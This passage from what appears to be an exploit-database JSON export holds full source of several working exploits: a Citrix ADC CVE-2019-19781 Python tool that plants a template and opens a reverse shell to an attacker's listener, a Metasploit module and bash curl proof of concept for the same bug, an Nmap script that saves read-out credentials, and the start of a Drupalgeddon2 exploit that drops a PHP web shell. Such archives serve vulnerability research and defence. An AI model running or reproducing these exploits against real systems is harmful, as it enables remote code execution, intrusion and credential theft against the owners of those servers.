404)\n\t\t\t\tprint_error(\"Target not Vulnerable\")\n\t\t\telse\n\t\t\t\tprint_error(\"Ooof, try again...\")\n\t\t\tend\n\t\tend\n\tend\n\tdef parse()\n\t\tcurrent_host = datastore['RHOST']\n\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\n\t words = 0\n\t while (line = fileObj.gets)\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\n\t \tfor ar in array_data\n\t \t\tif ar != \"............................................................\"\n\t \t\t\tprint_good(ar)\n\t \t\tend\n\t \tend\n\t \t#print_good(printable_data)\n\n\t\tend\n\t\tfileObj.close\n\tend\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T00:00:00", "type": "exploitpack", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "href": "", "sourceData": "#!/usr/bin/python3\n#\n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\n#\n# You only need a listener like netcat to catch the shell.\n#\n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White\n#\n# Tool Written by: Rob Simon and David Kennedy\n\nimport requests\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings\nimport random\nimport string\nimport time\nfrom random import randint\nimport argparse\nimport sys\n\n# random string generator\ndef randomString(stringLength=10):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n# our random string for filename - will leave artifacts on system\nfilename = randomString()\nrandomuser = randomString()\n\n# generate random number for the nonce\nnonce = randint(5, 15) \n\n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script\n# note that the file location will be in /netscaler/portal/templates/filename.xml\ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):\n\n # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)\n encoded = \"\"\n i=0\n text = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport))\n while i < len(text):\n encoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \"\n i += 1\n encoded = encoded[:-3]\n payload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\"\n headers = ( \n {\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\n 'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),\n 'NSC_NONCE' : '%s' % (nonce),\n })\n\n data = (\n {\n \"url\" : \"127.0.0.1\",\n \"title\" : payload,\n \"desc\" : \"desc\",\n \"UI_inuse\" : \"a\"\n })\n\n url = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport))\n requests.post(url, data=data, headers=headers, verify=False)\n\n# this is our second stage that triggers the exploit for us\ndef stage2(filename, randomuser, nonce, victimip, victimport):\n headers = (\n {\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\n 'NSC_USER' : '%s' % (randomuser),\n 'NSC_NONCE' : '%s' % (nonce),\n })\n\n requests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False)\n\n\n# start our main code to execute\nprint('''\n\n .o oOOOOOOOo OOOo\n Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO\n OboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO\n OOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB'\n `O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo\n .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO\n OOOOO '\"OOOOOOOOOOOOOOOO\"` oOO\n oOOOOOba. .adOOOOOOOOOOba .adOOOOo.\n oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO\n OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO\n \"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\"\n Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`\n : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .\n . oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo\n '%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO':\n `$\" `OOOO' `O\"Y ' `OOOO' o .\n . . OP\" : o .\n :\n\nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\nTool Written by: Rob Simon and Dave Kennedy\nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com\nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/\n\nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used\nto append files in an XML format to the victim machine. This in turn allows for remote code execution.\n\nBe sure to cleanup these two file locations:\n /var/tmp/netscaler/portal/templates/\n /netscaler/portal/templates/\n\nUsage:\n\npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''')\n\n# parse our commands\nparser = argparse.ArgumentParser()\nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\")\nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\")\nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\")\nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\")\nargs = parser.parse_args()\nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\")\nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename))\n# trigger our first post\nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)\nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\")\ntime.sleep(2)\nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\")\nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\")\nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\")\n# trigger our second post\nstage2(filename, randomuser, nonce, args.target, args.targetport)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T00:00:00", "type": "exploitpack", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "href": "", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\n# Date: 2019-12-17\n# CVE: CVE-2019-19781\n# Vulenrability: Path Traversal\n# Vulnerablity Discovery: Mikhail Klyuchnikov\n# Exploit Author: Dhiraj Mishra\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\n# Vendor Homepage: https://www.citrix.com/\n# References: https://support.citrix.com/article/CTX267027\n# https://github.com/nmap/nmap/pull/1893\n\nlocal http = require \"http\"\nlocal stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal table = require \"table\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal nmap = require \"nmap\"\nlocal io = require \"io\"\n\ndescription = [[\nThis NSE script checks whether the traget server is vulnerable to\nCVE-2019-19781\n]]\n---\n-- @usage\n-- nmap --script https-citrix-path-traversal -p <port> <host>\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\noutput='file.txt'\n-- @output\n-- PORT STATE SERVICE\n-- 443/tcp open http\n-- | CVE-2019-19781:\n-- | Host is vulnerable to CVE-2019-19781\n-- @changelog\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\n-- @xmloutput\n-- <table key=\"NMAP-1\">\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"description\">\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\n-- traversal vulnerability that allows attackers to read configurations or\nany other file.\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"year\">2019</elem>\n-- <elem key=\"day\">17</elem>\n-- <elem key=\"month\">12</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">17-12-2019</elem>\n-- <table key=\"extra_info\">\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\n-- </table>\n-- </table>\n\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\n\nportrule = shortport.ssl\n\naction = function(host,port)\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\n local vuln = {\n title = 'Citrix ADC Path Traversal',\n state = vulns.STATE.NOT_VULN,\n description = [[\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\n12.1, and 13.0 are vulnerable\nto a unauthenticated path traversal vulnerability that allows attackers to\nread configurations or any other file.\n ]],\n references = {\n 'https://support.citrix.com/article/CTX267027',\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\n },\n dates = {\n disclosure = {year = '2019', month = '12', day = '17'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n local path = \"/vpn/../vpns/cfg/smb.conf\"\n local response\n local output = {}\n local success = \"Host is vulnerable to CVE-2019-19781\"\n local fail = \"Host is not vulnerable\"\n local match = \"[global]\"\n local credentials\n local citrixADC\n response = http.get(host, port.number, path)\n\n if not response.status then\n stdnse.print_debug(\"Request Failed\")\n return\n end\n if response.status == 200 then\n if string.match(response.body, match) then\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\nSCRIPT_NAME,host.targetname or host.ip, path)\n vuln.state = vulns.STATE.VULN\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\nor host.ip,port.number, path))\n if outputFile then\n credentials = response.body:gsub('%W','.')\nvuln.check_results = stdnse.format_output(true, citrixADC)\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\nstored in the output file\")\nfile = io.open(outputFile, \"a\")\nfile:write(credentials, \"\\n\")\n else\n vuln.check_results = stdnse.format_output(true, citrixADC)\n end\n end\n elseif response.status == 403 then\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\nor host.ip, path, response.status)\n vuln.state = vulns.STATE.NOT_VULN\n end\n\n return vuln_report:make_output(vuln)\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T00:00:00", "type": "exploitpack", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC Remote Code Execution',\n 'Description' => %q(\n An issue was discovered in Citrix Application Delivery Controller (ADC)\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n ),\n 'Author' => [\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\n ['EDB', '47901'],\n ['EDB', '47902']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl meterpreter'\n }\n },\n 'Targets' => [\n ['Unix (remote shell)',\n 'Type' => :cmd_shell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\n 'DisablePayloadHandler' => 'false'\n }\n ],\n ['Unix (command-line)',\n 'Type' => :cmd_generic,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptAddress.new('RHOST', [true, 'The target address'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n\n deregister_options('RHOSTS')\n end\n\n def execute_command(command, opts = {})\n filename = Rex::Text.rand_text_alpha(16)\n nonce = Rex::Text.rand_text_alpha(6)\n\n request = {\n 'method' => 'POST',\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\n 'headers' => {\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\n 'NSC_NONCE' => nonce\n },\n 'vars_post' => {\n 'url' => 'http://127.0.0.1',\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\n 'desc' => 'desc',\n 'UI_inuse' => 'RfWeb'\n },\n 'encode_params' => false\n }\n\n begin\n received = send_request_cgi(request)\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n return false unless received\n\n if received.code == 200\n vprint_status(\"#{received.get_html_document.text}\")\n sleep 2\n\n request = {\n 'method' => 'GET',\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\n 'headers' => {\n 'NSC_USER' => nonce,\n 'NSC_NONCE' => nonce\n }\n }\n\n ## Trigger to gain exploitation.\n begin\n send_request_cgi(request)\n received = send_request_cgi(request)\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n return false unless received\n return received\n end\n\n return false\n end\n\n def get_chr_payload(command)\n chr_payload = command\n i = chr_payload.length\n\n output = \"\"\n chr_payload.each_char do | c |\n i = i - 1\n output << \"chr(\" << c.ord.to_s << \")\"\n if i != 0\n output << \" . \"\n end\n end\n\n return output\n end\n\n def check\n begin\n received = send_request_cgi(\n \"method\" => \"GET\",\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\n )\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n\n if received && received.code != 200\n return Exploit::CheckCode::Safe\n end\n return Exploit::CheckCode::Vulnerable\n end\n\n def exploit\n unless check.eql? Exploit::CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n else\n print_good('The target appears to be vulnerable.')\n end\n\n case target['Type']\n when :cmd_generic\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n\n received = execute_command(payload.encoded)\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\n print_warning('Dumping command output in parsed http response')\n print_good(\"#{received.get_html_document.text}\")\n else\n print_warning('Empty response, no command output')\n return\n end\n\n when :cmd_shell\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n\n execute_command(payload.encoded)\n end\n end\n\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T00:00:00", "type": "exploitpack", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "href": "", "sourceData": "#!/bin/bash\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\n# Release Date : 11/01/2020\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\necho \"=================================================================================\n ___ _ _ ____ ___ _ _\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\n |__/ CVE-2019-19781\n=================================================================================\"\n##############################\nif [ -z \"$1\" ];\nthen\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\nexit;\nfi\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\necho -ne \"Command Output :\\n\"\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "type": "exploitpack", "title": "Drupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "href": "", "sourceData": "#!/usr/bin/env ruby\n#\n# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/\n#\n# Authors:\n# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked\n# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k\n#\n\n\nrequire 'base64'\nrequire 'json'\nrequire 'net/http'\nrequire 'openssl'\nrequire 'readline'\nrequire 'highline/import'\n\n\n# Settings - Try to write a PHP to the web root?\ntry_phpshell = true\n# Settings - General/Stealth\n$useragent = \"drupalgeddon2\"\nwebshell = \"shell.php\"\n# Settings - Proxy information (nil to disable)\n$proxy_addr = nil\n$proxy_port = 8080\n\n\n# Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!)\nbashcmd = \"<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }\"\nbashcmd = \"echo \" + Base64.strict_encode64(bashcmd) + \" | base64 -d\"\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Function http_request <url> [type] [data]\ndef http_request(url, type=\"get\", payload=\"\", cookie=\"\")\n puts verbose(\"HTTP - URL : #{url}\") if $verbose\n puts verbose(\"HTTP - Type: #{type}\") if $verbose\n puts verbose(\"HTTP - Data: #{payload}\") if not payload.empty? and $verbose\n\n begin\n uri = URI(url)\n request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)\n request.initialize_http_header({\"User-Agent\" => $useragent})\n request.initialize_http_header(\"Cookie\" => cookie) if not cookie.empty?\n request.body = payload if not payload.empty?\n return $http.request(request)\n rescue SocketError\n puts error(\"Network connectivity issue\")\n rescue Errno::ECONNREFUSED => e\n puts error(\"The target is down ~ #{e.message}\")\n puts error(\"Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...\") if $proxy_addr\n rescue Timeout::Error => e\n puts error(\"The target timed out ~ #{e.message}\")\n end\n\n # If we got here, something went wrong.\n exit\nend\n\n\n# Function gen_evil_url <cmd> [method] [shell] [phpfunction]\ndef gen_evil_url(evil, element=\"\", shell=false, phpfunction=\"passthru\")\n puts info(\"Payload: #{evil}\") if not shell\n puts verbose(\"Element : #{element}\") if not shell and not element.empty? and $verbose\n puts verbose(\"PHP fn : #{phpfunction}\") if not shell and $verbose\n\n # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render\n # Check the version to match the payload\n if $drupalverion.start_with?(\"8\") and element == \"mail\"\n # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200\n url = $target + $clean_url + $form + \"?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpfunction + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\n\n elsif $drupalverion.start_with?(\"8\") and element == \"timezone\"\n # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru\n url = $target + $clean_url + $form + \"?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=\" + phpfunction + \"&timezone[a][#lazy_builder][][]=\" + evil\n\n #puts warning(\"WARNING: May benefit to use a PHP web shell\") if not try_phpshell and phpfunction != \"passthru\"\n\n elsif $drupalverion.start_with?(\"7\") and element == \"name\"\n # Method #3 - Drupal v7.x: name, #post_render - HTTP 200\n url = $target + \"#{$clean_url}#{$form}&name[%23post_render][]=\" + phpfunction + \"&name[%23type]=markup&name[%23markup]=\" + evil\n payload = \"form_id=user_pass&_triggering_element_name=name\"\n end\n\n # Drupal v7.x needs an extra value from a form\n if $drupalverion.start_with?(\"7\")\n response = http_request(url, \"post\", payload, 